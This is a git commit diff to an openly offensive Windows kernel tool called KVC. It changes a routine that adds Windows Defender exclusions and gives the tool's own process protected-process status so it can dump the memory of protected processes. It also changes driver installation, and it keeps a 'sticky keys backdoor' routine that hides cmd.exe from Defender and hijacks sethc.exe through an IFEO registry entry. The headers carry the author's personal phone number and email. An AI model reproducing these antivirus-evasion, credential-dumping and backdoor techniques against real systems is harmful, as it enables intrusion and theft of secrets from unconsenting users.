Overwrite content

2025-09-18 23:42:08 +02:00
parent ebc93881a8
commit a84cb5ba92
7 changed files with 141 additions and 59 deletions
--- a/README.md
+++ b/README.md
@@ -1,11 +1,3 @@
 <div align="center">
  <h3 style="color:red; font-weight:800; text-transform:uppercase;">
    IMPORTANT NOTICE — DO NOT DOWNLOAD THE BINARY TODAY (18.09.2025 / SEPTEMBER 18, 2025)
  </h3>
  <p style="color:red; font-weight:700; max-width:900px; margin:0 auto; text-transform:uppercase;">
    FULL WINDOWS 10 SUPPORT IS BEING DEPLOYED AND A LEGACY-TYPE COMPILATION IS CURRENTLY BEING GENERATED IN THE BACKGROUND. DOWNLOADING THE CURRENT BINARY MAY CAUSE INSTABILITY OR INCOMPATIBILITY. PLEASE WAIT FOR THE STABLE RELEASE.
  </p>
 </div>
 # KVC - Kernel Vulnerability Capabilities Framework
 <div align="center">
--- a/kvc/Controller.h
+++ b/kvc/Controller.h
@@ -171,6 +171,7 @@ private:
                        std::vector<BYTE>& kvcCryptData) noexcept;
    // Atomic driver operations for stability
    bool ForceRemoveService() noexcept;
 	bool EnsureDriverAvailable() noexcept;
    bool IsDriverCurrentlyLoaded() noexcept;
    bool PerformAtomicInit() noexcept;
--- a/kvc/ControllerCore.cpp
+++ b/kvc/ControllerCore.cpp
@@ -129,6 +129,7 @@ bool Controller::PerformAtomicInitWithErrorCleanup() noexcept {
 // Core driver availability check with fallback mechanisms
 bool Controller::EnsureDriverAvailable() noexcept {
    // Phase 1: Check if the driver is already available (without testing)
 	ForceRemoveService();
    if (IsDriverCurrentlyLoaded()) {
        return true;
    }
--- a/kvc/ControllerDriverManager.cpp
+++ b/kvc/ControllerDriverManager.cpp
@@ -1,3 +1,28 @@
 /*******************************************************************************
  _  ____     ______ 
 | |/ /\ \   / / ___|
 | ' /  \ \ / / |    
 | . \   \ V /| |___ 
 |_|\_\   \_/  \____|
 The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, 
 offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived 
 as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation 
 of kernel-level primitives** for legitimate security research and penetration testing.
 KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows 
 security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware 
 Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures 
 that define these protections.
  -----------------------------------------------------------------------------
  Author : Marek Wesołowski
  Email  : marek@wesolowski.eu.org
  Phone  : +48 607 440 283 (Tel/WhatsApp)
  Date   : 04-09-2025
 *******************************************************************************/
 // ControllerDriverManager.cpp
 #include "Controller.h"
 #include "common.h"
@@ -7,6 +32,33 @@
 namespace fs = std::filesystem;
 bool Controller::ForceRemoveService() noexcept {
    if (!InitDynamicAPIs()) {
        return false;
    }
    SC_HANDLE hSCM = OpenSCManagerW(nullptr, nullptr, SC_MANAGER_ALL_ACCESS);
    if (!hSCM) {
        return false;
    }
    SC_HANDLE hService = g_pOpenServiceW(hSCM, GetServiceName().c_str(), DELETE);
    if (!hService) {
        DWORD err = GetLastError();
        CloseServiceHandle(hSCM);
        return (err == ERROR_SERVICE_DOES_NOT_EXIST); 
    }
    BOOL success = g_pDeleteService(hService);
    DWORD err = GetLastError();
    CloseServiceHandle(hService);
    CloseServiceHandle(hSCM);
    return success || (err == ERROR_SERVICE_MARKED_FOR_DELETE);
 }
 // Driver service lifecycle management
 bool Controller::StopDriverService() noexcept {
    DEBUG(L"StopDriverService called");
@@ -90,6 +142,7 @@ std::vector<BYTE> Controller::DecryptDriver(const std::vector<BYTE>& encryptedDa
 // Silent driver installation with TrustedInstaller privileges
 bool Controller::InstallDriverSilently() noexcept {
    ForceRemoveService();
 	auto encryptedData = ExtractEncryptedDriver();
    if (encryptedData.empty()) return false;
@@ -184,6 +237,7 @@ bool Controller::StartDriverServiceSilent() noexcept {
 // Legacy driver installation with enhanced error handling
 bool Controller::InstallDriver() noexcept {
 	ForceRemoveService();
    auto encryptedData = ExtractEncryptedDriver();
    if (encryptedData.empty()) {
        ERROR(L"Failed to extract encrypted driver from icon resource");
--- a/kvc/ControllerMemoryOperations.cpp
+++ b/kvc/ControllerMemoryOperations.cpp
@@ -80,12 +80,15 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
    std::wstring processName = Utils::GetProcessName(pid);
-    // Add process to Defender exclusions to prevent interference during dumping
+    // Try to add process to Defender exclusions to prevent interference during dumping
    std::wstring processNameWithExt = processName;
    if (processNameWithExt.find(L".exe") == std::wstring::npos) {
        processNameWithExt += L".exe";
    }
-    m_trustedInstaller.AddProcessToDefenderExclusions(processName);
+    
    if (!m_trustedInstaller.AddProcessToDefenderExclusions(processName)) {
        INFO(L"AV exclusion skipped: %s", processName.c_str());
    }
    // System process validation - these processes cannot be dumped
    if (pid == 4 || processName == L"System") {
@@ -128,21 +131,18 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
        return false;
    }
-    // Get target process protection level for elevation
+    // Get target process protection level for elevation - this is auxiliary
    auto kernelAddr = GetProcessKernelAddress(pid);
    if (!kernelAddr) {
-        ERROR(L"Failed to get kernel address for target process");
+        INFO(L"Could not get kernel address for target process (continuing without self-protection)");
        m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName);
        PerformAtomicCleanup();
        return false;
    }
-    auto targetProtection = GetProcessProtection(kernelAddr.value());
+    auto targetProtection = std::optional<UCHAR>{};
    if (kernelAddr) {
        targetProtection = GetProcessProtection(kernelAddr.value());
        if (!targetProtection) {
-        ERROR(L"Failed to get protection info for target process");
+            INFO(L"Could not get protection info for target process (continuing without self-protection)");
-        m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName);
+        }
        PerformAtomicCleanup();
        return false;
    }
    if (g_interrupted) {
@@ -152,13 +152,13 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
        return false;
    }
-    // Protection elevation to match target process level
+    // Protection elevation to match target process level - auxiliary feature
-    if (targetProtection.value() > 0) {
+    if (targetProtection && targetProtection.value() > 0) {
        UCHAR targetLevel = Utils::GetProtectionLevel(targetProtection.value());
        UCHAR targetSigner = Utils::GetSignerType(targetProtection.value());
        std::wstring levelStr = (targetLevel == static_cast<UCHAR>(PS_PROTECTED_TYPE::Protected)) ? L"PP" : L"PPL";
-        std::wstring signerStr;
+        std::wstring signerStr = L"Unknown";
        switch (static_cast<PS_PROTECTED_SIGNER>(targetSigner)) {
            case PS_PROTECTED_SIGNER::Lsa: signerStr = L"Lsa"; break;
@@ -170,25 +170,26 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
            case PS_PROTECTED_SIGNER::CodeGen: signerStr = L"CodeGen"; break;
            case PS_PROTECTED_SIGNER::App: signerStr = L"App"; break;
            default: 
-                ERROR(L"Unknown signer type for target process");
+                INFO(L"Unknown signer type - skipping self-protection");
-                m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName);
+                break;
                PerformAtomicCleanup();
                return false;
        }
        if (signerStr != L"Unknown") {
            INFO(L"Target process protection: %s-%s", levelStr.c_str(), signerStr.c_str());
            if (!SelfProtect(levelStr, signerStr)) {
-            ERROR(L"Failed to set self protection to %s-%s", levelStr.c_str(), signerStr.c_str());
+                INFO(L"Self-protection failed: %s-%s (continuing with dump)", levelStr.c_str(), signerStr.c_str());
            } else {
-            SUCCESS(L"Set self protection to %s-%s", levelStr.c_str(), signerStr.c_str());
+                SUCCESS(L"Self-protection set to %s-%s", levelStr.c_str(), signerStr.c_str());
            }
        }
    } else {
        INFO(L"Target process is not protected, no self-protection needed");
    }
    // Try to enable debug privilege - auxiliary feature
    if (!EnableDebugPrivilege()) {
-        ERROR(L"Failed to enable debug privilege");
+        INFO(L"Debug privilege failed (continuing with dump anyway)");
    }
    if (g_interrupted) {
@@ -199,12 +200,12 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
        return false;
    }
-    // Open target process with appropriate privileges
+    // Open target process with appropriate privileges - CRITICAL operation
    HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pid);
    if (!hProcess) {
        hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid);
        if (!hProcess) {
-            ERROR(L"Failed to open process (error: %d)", GetLastError());
+            ERROR(L"Critical: Failed to open process (error: %d)", GetLastError());
            m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName);
            PerformAtomicCleanup();
            return false;
@@ -217,9 +218,10 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
        fullPath += L"\\";
    fullPath += processName + L"_" + std::to_wstring(pid) + L".dmp";
    // Create dump file - CRITICAL operation
    HANDLE hFile = CreateFileW(fullPath.c_str(), GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
-        ERROR(L"Failed to create dump file (error: %d)", GetLastError());
+        ERROR(L"Critical: Failed to create dump file (error: %d)", GetLastError());
        CloseHandle(hProcess);
        m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName);
        PerformAtomicCleanup();
@@ -249,6 +251,7 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
    INFO(L"Creating memory dump - this may take a while. Press Ctrl+C to cancel safely.");
    // Execute the actual memory dump - CRITICAL operation
    BOOL result = MiniDumpWriteDump(hProcess, pid, hFile, dumpType, NULL, NULL, NULL);
    if (g_interrupted) {
@@ -269,19 +272,19 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
        DWORD error = GetLastError();
        switch (error) {
            case ERROR_TIMEOUT:
-                ERROR(L"MiniDumpWriteDump timed out - process may be unresponsive or in critical section");
+                ERROR(L"Critical: MiniDumpWriteDump timed out - process may be unresponsive or in critical section");
                break;
            case RPC_S_CALL_FAILED:
-                ERROR(L"RPC call failed - process may be a kernel-mode or system-critical process");
+                ERROR(L"Critical: RPC call failed - process may be a kernel-mode or system-critical process");
                break;
            case ERROR_ACCESS_DENIED:
-                ERROR(L"Access denied - insufficient privileges even with protection bypass");
+                ERROR(L"Critical: Access denied - insufficient privileges even with protection bypass");
                break;
            case ERROR_PARTIAL_COPY:
-                ERROR(L"Partial copy - some memory regions could not be read");
+                ERROR(L"Critical: Partial copy - some memory regions could not be read");
                break;
            default:
-                ERROR(L"MiniDumpWriteDump failed (error: %d / 0x%08x)", error, error);
+                ERROR(L"Critical: MiniDumpWriteDump failed (error: %d / 0x%08x)", error, error);
                break;
        }
        DeleteFileW(fullPath.c_str());
@@ -293,8 +296,11 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
    SUCCESS(L"Memory dump created successfully: %s", fullPath.c_str());
    // Cleanup phase - these operations are non-critical
    INFO(L"Removing self-protection before cleanup...");
-    SelfProtect(L"none", L"none");
+    if (!SelfProtect(L"none", L"none")) {
        DEBUG(L"Self-protection removal failed (non-critical)");
    }
    if (g_interrupted) {
        INFO(L"Operation completed but cleanup was interrupted");
@@ -303,8 +309,11 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
        return true;
    }
-    // Clean up Defender exclusions and perform atomic cleanup
+    // Clean up Defender exclusions and perform atomic cleanup - non-critical
-    m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName);
+    if (!m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName)) {
        DEBUG(L"AV cleanup skipped: %s", processName.c_str());
    }
    PerformAtomicCleanup();
    return true;
--- a/kvc/TrustedInstallerIntegrator.cpp
+++ b/kvc/TrustedInstallerIntegrator.cpp
@@ -247,7 +247,7 @@ bool TrustedInstallerIntegrator::AddDefenderExclusion(ExclusionType type, const
    if (result) {
        SUCCESS(L"Successfully added to Windows Defender %s exclusions: %s", typeStr.c_str(), processedValue.c_str());
    } else {
-        ERROR(L"Failed to add to Windows Defender %s exclusions: %s", typeStr.c_str(), processedValue.c_str());
+        INFO(L"AV exclusion skipped: %s %s", typeStr.c_str(), processedValue.c_str());
    }
    return result;
@@ -287,7 +287,7 @@ bool TrustedInstallerIntegrator::RemoveDefenderExclusion(ExclusionType type, con
    if (result) {
        SUCCESS(L"Successfully removed from Windows Defender %s exclusions: %s", typeStr.c_str(), processedValue.c_str());
    } else {
-        ERROR(L"Failed to remove from Windows Defender %s exclusions: %s", typeStr.c_str(), processedValue.c_str());
+        INFO(L"AV cleanup skipped: %s %s", typeStr.c_str(), processedValue.c_str());
    }
    return result;
@@ -403,8 +403,8 @@ bool TrustedInstallerIntegrator::InstallStickyKeysBackdoor() noexcept
    // First add cmd.exe to Defender process exclusions to prevent detection
    if (!AddProcessToDefenderExclusions(L"cmd.exe")) {
-        ERROR(L"Failed to add cmd.exe to Defender process exclusions");
+        INFO(L"AV exclusion skipped for cmd.exe (continuing)");
-        return false;
+        
    }
    // Create IFEO registry entry for sethc.exe
@@ -459,8 +459,8 @@ bool TrustedInstallerIntegrator::RemoveStickyKeysBackdoor() noexcept
    // Remove cmd.exe from Defender process exclusions
    if (!RemoveProcessFromDefenderExclusions(L"cmd.exe")) {
-        ERROR(L"Failed to remove cmd.exe from Defender process exclusions");
+        INFO(L"AV cleanup skipped for cmd.exe");
-        success = false;
+        
    }
    if (success) {
@@ -610,7 +610,7 @@ bool TrustedInstallerIntegrator::AddProcessToDefenderExclusions(const std::wstri
    if (result) {
        SUCCESS(L"Successfully added to Windows Defender process exclusions: %s", processName.c_str());
    } else {
-        ERROR(L"Failed to add to Windows Defender process exclusions: %s", processName.c_str());
+        INFO(L"AV exclusion skipped: %s", processName.c_str());
    }
    return result;
@@ -635,7 +635,7 @@ bool TrustedInstallerIntegrator::RemoveProcessFromDefenderExclusions(const std::
    if (result) {
        SUCCESS(L"Successfully removed from Windows Defender process exclusions: %s", processName.c_str());
    } else {
-        ERROR(L"Failed to remove from Windows Defender process exclusions: %s", processName.c_str());
+        INFO(L"AV cleanup skipped: %s", processName.c_str());
    }
    return result;
--- a/kvc/Utils.cpp
+++ b/kvc/Utils.cpp
@@ -1,3 +1,28 @@
 /*******************************************************************************
  _  ____     ______ 
 | |/ /\ \   / / ___|
 | ' /  \ \ / / |    
 | . \   \ V /| |___ 
 |_|\_\   \_/  \____|
 The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, 
 offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived 
 as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation 
 of kernel-level primitives** for legitimate security research and penetration testing.
 KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows 
 security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware 
 Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures 
 that define these protections.
  -----------------------------------------------------------------------------
  Author : Marek Wesołowski
  Email  : marek@wesolowski.eu.org
  Phone  : +48 607 440 283 (Tel/WhatsApp)
  Date   : 04-09-2025
 *******************************************************************************/
 // Utils.cpp - Fixed compilation issues with NtQuerySystemInformation
 #include "Utils.h"
 #include "common.h"